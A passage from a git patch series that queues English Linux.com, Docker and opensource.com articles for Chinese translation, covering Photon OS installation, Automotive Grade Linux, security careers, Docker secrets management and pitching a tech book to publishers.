flags. + +* Operating system boots with validated trust. + +* Photon management daemon manages firewall, network, packages, and users on remote Photon OS machines. + +* Support for persistent volumes. + +* [Project Lightwave][7] integration. + +* Timely security patches and updates. + +Photon can be used via [ISO][22], [OVA][23], [Amazon Machine Image][24], [Google Compute Engine image][25], and [Azure VHD][26]. I’ll show you how to install Photon on VirtualBox, using an ISO image. The installation takes about five minutes and, in the end, you’ll have a virtual machine, ready to deploy containers. + +### Creating the virtual machine + +Before you deploy that first container, you have to create the virtual machine and install Photon. To do this, open up VirtualBox and click the New button. Walk through the Create Virtual Machine wizard (giving Photon the necessary resources, based on the usage you predict the container server will need). Once you’ve created the virtual machine, you need to first make a change to the settings. Select the newly created virtual machine (in the left pane of the VirtualBox main window) and then click Settings. In the resulting window, click on Network (from the left navigation). + +In the Networking window (Figure 1), you need to change the Attached to drop-down to Bridged Adapter. This will ensure your Photon server is reachable from your network. Once you’ve made that change, click OK. + +### [photon_0.jpg][8] + +![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change settings") +Figure 1: Changing the VirtualBox network settings for Photon.[Used with permission][1] + +Select your Photon virtual machine from the left navigation and then click Start. You will be prompted to locate and attach the IOS image. Once you’ve done that, Photon will boot up and prompt you to hit Enter to begin the installation. The installation is ncurses based (there is no GUI), but it’s incredibly simple. + +In the next screen (Figure 2), you will be asked if you want to do a Minimal, Full, or OSTree Server. I opted to go the Full route. Select whichever option you require and hit enter. + +### [photon_1.jpg][9] + +![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") +Figure 2: Selecting your installation type.[Used with permission][2] + +In the next window, select the disk that will house Photon. Since we’re installing this as a virtual machine, there will be only one disk listed (Figure 3). Tab down to Auto and hit Enter on your keyboard. The installation will then require you to type (and verify) an administrator password. Once you’ve done that, the installation will begin and finish in less than five minutes. + +### [photon_2.jpg][10] + +![Photon ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") +Figure 3: Selecting your hard disk for the Photon installation.[Used with permission][3] + +Once the installation completes, reboot the virtual machine and log in with the username root and the password you created during installation. You are ready to start working. + +Before you begin using Docker on Photon, you’ll want to upgrade the platform. Photon uses the _yum_ package manager, so login as root and issue the command  _yum update_ .If there are any updates available, you’ll be asked to okay the process (Figure 4). + +### [photon_3.jpg][11] + +![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") +Figure 4: Updating Photon.[Used with permission][4] + +Usage + +As I mentioned, Photon comes with everything you need to deploy containers or even create a Kubernetes cluster. However, out of the box, there are a few things you’ll need to do. The first thing is to enable the Docker daemon to run at start. To do this, issue the commands: + +``` +systemctl start docker + +systemctl enable docker +``` + +Now we need to create a standard user, so we’re not running the docker command as root. To do this, issue the following commands: + +``` +useradd -m USERNAME + +passwd USERNAME +``` + +Where USERNAME is the name of the user to add. + +Next we need to add the new user to the  _docker_ group with the command: + +``` +usermod -a -G docker USERNAME +``` + +Where USERNAME is the name of the user just created. + +Log out as the root user and log back in as the newly created user. You can now work with the  _docker _ command without having to make use of  _sudo_  or switching to the root user. Pull down an image from Docker Hub and start deploying containers. + +### An outstanding container platform + +Photon is, without a doubt, an outstanding platform, geared specifically for containers. Do note that Photon is an open source project, so there is no paid support to be had. If you find yourself having trouble with Photon, hop on over to the [Issues tab in the Photon Project’s Github page][27], where you can read and post about issues. And if you’re interested in forking Photon, you’ll find the source code on the project’s [official Github page][28]. + +Give Photon a try and see if it doesn’t make deploying Docker containers and/or Kubernetes clusters significantly easier. + + _Learn more about Linux through the free ["Introduction to Linux" ][29]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: 网址 + +作者:[ JACK WALLEN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/creative-commons-zero +[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project +[7]:http://vmware.github.io/lightwave/ +[8]:https://www.linux.com/files/images/photon0jpg +[9]:https://www.linux.com/files/images/photon1jpg +[10]:https://www.linux.com/files/images/photon2jpg +[11]:https://www.linux.com/files/images/photon3jpg +[12]:https://www.linux.com/files/images/photon-linuxjpg +[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux +[14]:https://www.docker.com/ +[15]:https://vmware.github.io/photon/ +[16]:https://www.vmware.com/ +[17]:https://www.vmware.com/products/vsphere.html +[18]:https://azure.microsoft.com/ +[19]:https://cloud.google.com/compute/ +[20]:https://aws.amazon.com/ec2/ +[21]:https://www.virtualbox.org/ +[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[27]:https://github.com/vmware/photon/issues +[28]:https://github.com/vmware/photon +[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux From 760de503c0e165082a9e1c2af1ec8020f6e545af Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:47:46 +0800 Subject: [PATCH 0171/1627] =?UTF-8?q?20171203-7=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...n Source Components Ease Learning Curve.md | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md diff --git a/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md b/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md new file mode 100644 index 0000000000..9eee39888a --- /dev/null +++ b/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md @@ -0,0 +1,70 @@ +Inside AGL: Familiar Open Source Components Ease Learning Curve +============================================================ + +![Matt Porter](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/porter-elce-agl.png?itok=E-5xG98S "Matt Porter") +Konsulko’s Matt Porter (pictured) and Scott Murray ran through the major components of the AGL’s Unified Code Base at Embedded Linux Conference Europe.[The Linux Foundation][1] + +Among the sessions at the recent [Embedded Linux Conference Europe (ELCE)][5] — 57 of which are [available on YouTube][2] -- are several reports on the Linux Foundation’s [Automotive Grade Linux project][6]. These include [an overview from AGL Community Manager Walt Miner ][3]showing how AGL’s Unified Code Base (UCB) Linux distribution is expanding from in-vehicle infotainment (IVI) to ADAS. There was even a presentation on using AGL to build a remote-controlled robot (see links below). + +Here we look at the “State of AGL: Plumbing and Services,” from Konsulko Group’s CTO Matt Porter and senior staff software engineer Scott Murray. Porter and Murray ran through the components of the current [UCB 4.0 “Daring Dab”][7] and detailed major upstream components and API bindings, many of which will be appear in the Electric Eel release due in Jan. 2018. + +Despite the automotive focus of the AGL stack, most of the components are already familiar to Linux developers. “It looks a lot like a desktop distro,” Porter told the ELCE attendees in Prague. “All these familiar friends.” + +Some of those friends include the underlying Yocto Project “Poky” with OpenEmbedded foundation, which is topped with layers like oe-core, meta-openembedded, and metanetworking. Other components are based on familiar open source software like systemd (application control), Wayland and Weston (graphics), BlueZ (Bluetooth), oFono (telephony), PulseAudio and ALSA (audio), gpsd (location), ConnMan (Internet), and wpa-supplicant (WiFi), among others. + +UCB’s application framework is controlled through a WebSocket interface to the API bindings, thereby enabling apps to talk to each other. There’s also a new W3C widget for an alternative application packaging scheme, as well as support for SmartDeviceLink, a technology developed at Ford that automatically syncs up IVI systems with mobile phones.  + +AGL UCB’s Wayland/Weston graphics layer is augmented with an “IVI shell” that works with the layer manager. “One of the unique requirements of automotive is the ability to separate aspects of the application in the layers,” said Porter. “For example, in a navigation app, the graphics rendering for the map may be completely different than the engine used for the UI decorations. One engine layers to a surface in Wayland to expose the map while the decorations and controls are handled by another layer.” + +For audio, ALSA and PulseAudio are joined by GENIVI AudioManager, which works together with PulseAudio. “We use AudioManager for policy driven audio routing,” explained Porter. “It allows you to write a very complex XML-based policy using a rules engine with audio routing.” + +UCB leans primarily on the well-known [Smack Project][8] for security, and also incorporates Tizen’s [Cynara][9] safe policy-checker service. A Cynara-enabled D-Bus daemon is used to control Cynara security policies. + +Porter and Murray went on to explain AGL’s API binding mechanism, which according to Murray “abstracts the UI from its back-end logic so you can replace it with your own custom UI.” You can re-use application logic with different UI implementations, such as moving from the default Qt to HTML5 or a native toolkit. Application binding requests and responses use JSON via HTTP or WebSocket. Binding calls can be made from applications or from other bindings, thereby enabling “stacking” of bindings. + +Porter and Murray concluded with a detailed description of each binding. These include upstream bindings currently in various stages of development. The first is a Master binding that manages the application lifecycle, including tasks such as install, uninstall, start, and terminate. Other upstream bindings include the WiFi binding and the BlueZ-based Bluetooth binding, which in the future will be upgraded with Bluetooth [PBAP][10] (Phone Book Access Profile). PBAP can connect with contacts databases on your phone, and links to the Telephony binding to replicate caller ID. + +The oFono-based Telephony binding also makes calls to the Bluetooth binding for Bluetooth Hands-Free-Profile (HFP) support. In the future, Telephony binding will add support for sent dial tones, call waiting, call forwarding, and voice modem support. + +Support for AM/FM radio is not well developed in the Linux world, so for its Radio binding, AGL started by supporting [RTL-SDR][11] code for low-end radio dongles. Future plans call for supporting specific automotive tuner devices. + +The MediaPlayer binding is in very early development, and is currently limited to GStreamer based audio playback and control. Future plans call for adding playlist controls, as well as one of the most actively sought features among manufacturers: video playback support. + +Location bindings include the [gpsd][12] based GPS binding, as well as GeoClue and GeoFence. GeoClue, which is built around the [GeoClue][13] D-Bus geolocation service, “overlaps a little with GPS, which uses the same location data,” says Porter. GeoClue also gathers location data from WiFi AP databases, 3G/4G tower info, and the GeoIP database — sources that are useful “if you’re inside or don’t have a good fix,” he added. + +GeoFence depends on the GPS binding, as well. It lets you establish a bounding box, and then track ingress and egress events. GeoFence also tracks “dwell” status, which is determined by arriving at home and staying for 10 minutes. “It then triggers some behavior based on a timeout,” said Porter. Future plans call for a customizable dwell transition time. + +While most of these Upstream bindings are well established, there are also Work in Progress (WIP) bindings that are still in the early stages, including CAN, HomeScreen, and WindowManager bindings. Farther out, there are plans to add speech recognition and text-to-speech bindings, as well as a WWAN modem binding. + +In conclusion, Porter noted: “Like any open source project, we desperately need more developers.” The Automotive Grade Linux project may seem peripheral to some developers, but it offers a nice mix of familiarity — grounded in many widely used open source projects -- along with the excitement of expanding into a new and potentially game changing computing form factor: your automobile. AGL has also demonstrated success — you can now [check out AGL in action in the 2018 Toyota Camry][14], followed in the coming month by most Toyota and Lexus vehicles sold in North America. + +Watch the complete video below: + +[视频][15] + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/event/elce/2017/11/inside-agl-familiar-open-source-components-ease-learning-curve + +作者:[ ERIC BROWN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/ericstephenbrown +[1]:https://www.linux.com/licenses/category/linux-foundation +[2]:https://www.youtube.com/playlist?list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk +[3]:https://www.youtube.com/watch?v=kfwEmjSjAzM&index=14&list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk +[4]:https://www.linux.com/files/images/porter-elce-aglpng +[5]:http://events.linuxfoundation.org/events/embedded-linux-conference-europe +[6]:https://www.automotivelinux.org/ +[7]:https://www.linux.com/blog/2017/8/automotive-grade-linux-moves-ucb-40-launches-virtualization-workgroup +[8]:http://schaufler-ca.com/ +[9]:https://wiki.tizen.org/Security:Cynara +[10]:https://wiki.maemo.org/Bluetooth_PBAP +[11]:https://www.rtl-sdr.com/about-rtl-sdr/ +[12]:http://www.catb.org/gpsd/ +[13]:https://www.freedesktop.org/wiki/Software/GeoClue/ +[14]:https://www.linux.com/blog/event/automotive-linux-summit/2017/6/linux-rolls-out-toyota-and-lexus-vehicles +[15]:https://youtu.be/RgI-g5h1t8I From 18758b44a858c0c320540410c9fc207bde553316 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:52:21 +0800 Subject: [PATCH 0172/1627] =?UTF-8?q?20171203-9=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...obs Are Hot Get Trained and Get Noticed.md | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md diff --git a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md new file mode 100644 index 0000000000..a0a6b1ed60 --- /dev/null +++ b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md @@ -0,0 +1,58 @@ +Security Jobs Are Hot: Get Trained and Get Noticed +============================================================ + +![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills") +The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1] + +The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low. + +### Security is the place to be + +In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case. + +In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage. + +### Be fearless + +Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future. + +There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies is in the proactive side of security, finding, and eliminating vulnerabilities while maintaining or even improving the end-user experience.   + +### Growth is imminent + +Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.            + +Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.   + +### Training and support + +Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolve. + +My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health. + +### The end game + +More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss. + +Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute. + + _[Download ][2]the full 2017 Open Source Jobs Report now._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed + +作者:[ BEN COLLEN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/bencollen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:http://bit.ly/2017OSSjobsreport +[3]:https://www.linux.com/files/images/security-skillspng +[4]:http://www.dice.com/ +[5]:http://cyberseek.org/index.html#about +[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163 +[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/ From 2a09e5ac1d0a54bdb62e688b7f23408d594fffc6 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:54:43 +0800 Subject: [PATCH 0173/1627] =?UTF-8?q?20171203-10=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 110 ++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md new file mode 100644 index 0000000000..a3fc2c886e --- /dev/null +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -0,0 +1,110 @@ +INTRODUCING DOCKER SECRETS MANAGEMENT +============================================================ + +Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps. + + ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) + +A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform. + +With containers, applications are now dynamic and portable across multiple environments. This  made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought. + +### Introducing Docker Secrets Management + +We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less. + +By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles. + +The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object. + + ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) + +In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm. + +``` +$ echo "This is a secret" | docker secret create my_secret_data - +``` + +Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL’s Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the the rest of the swarm management data gets. + +When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start. + +When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them. + +``` +$ docker service  create --name="redis" --secret="my_secret_data" redis:alpine +``` + +The  unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/. + +``` +$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets +total 4 +-r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data +``` + +If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret. + +``` +$ docker service update --secret-rm="my_secret_data" redis + +$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data + +cat: can't open '/run/secrets/my_secret_data': No such file or directory +``` + +Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to Laurens Van Houtven (https://www.lvh.io/[)][19] in collaboration with the Docker security and core engineering team to help make this feature a reality. + +[Get safer apps for dev and ops w/ new #Docker secrets management][5] + +[CLICK TO TWEET][6] + +### +![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) + +### Safer Apps with Docker + +Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application. + +Resources to learn more: + +* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7] + +* [Download Docker][8] and get started today + +* [Try secrets in Docker Datacenter][9] + +* [Read the Documentation][10] + +* Attend an [upcoming webinar][11] + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/02/docker-secrets-management/ + +作者:[ Ying Li][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/yingli/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management +[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management +[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[7]:http://dockr.ly/AppSecurity +[8]:https://www.docker.com/getdocker +[9]:http://www.docker.com/trial +[10]:https://docs.docker.com/engine/swarm/secrets/ +[11]:http://www.docker.com/webinars +[12]:https://blog.docker.com/author/yingli/ +[13]:https://blog.docker.com/tag/container-security/ +[14]:https://blog.docker.com/tag/docker-security/ +[15]:https://blog.docker.com/tag/secrets-management/ +[16]:https://blog.docker.com/tag/security/ +[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/ +[18]:https://docs.docker.com/engine/swarm/secrets/ +[19]:https://lvh.io%29/ From dcd0b04bb2cbef0ee8e288a8d3d6ec7fc313a151 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:59:24 +0800 Subject: [PATCH 0174/1627] =?UTF-8?q?20171203-11=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to find a publisher for your tech book.md | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 sources/tech/20171201 How to find a publisher for your tech book.md diff --git a/sources/tech/20171201 How to find a publisher for your tech book.md b/sources/tech/20171201 How to find a publisher for your tech book.md new file mode 100644 index 0000000000..76dc8112ca --- /dev/null +++ b/sources/tech/20171201 How to find a publisher for your tech book.md @@ -0,0 +1,76 @@ +How to find a publisher for your tech book +============================================================ + +### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works. + + +![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") +Image by : opensource.com + +You've got an idea for a technical book—congratulations! Like a hiking the Appalachian trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters. + +If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed. + +### Identify your target + +Your first step is to figure out which publisher is the a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with. + +Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher. + +Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. + +If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out. + +### Work your network + +Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person. + +Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor. + +For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you. + +Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do. + +### If all else fails + +If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best. + +### And ... wait + +No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything. + +After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's 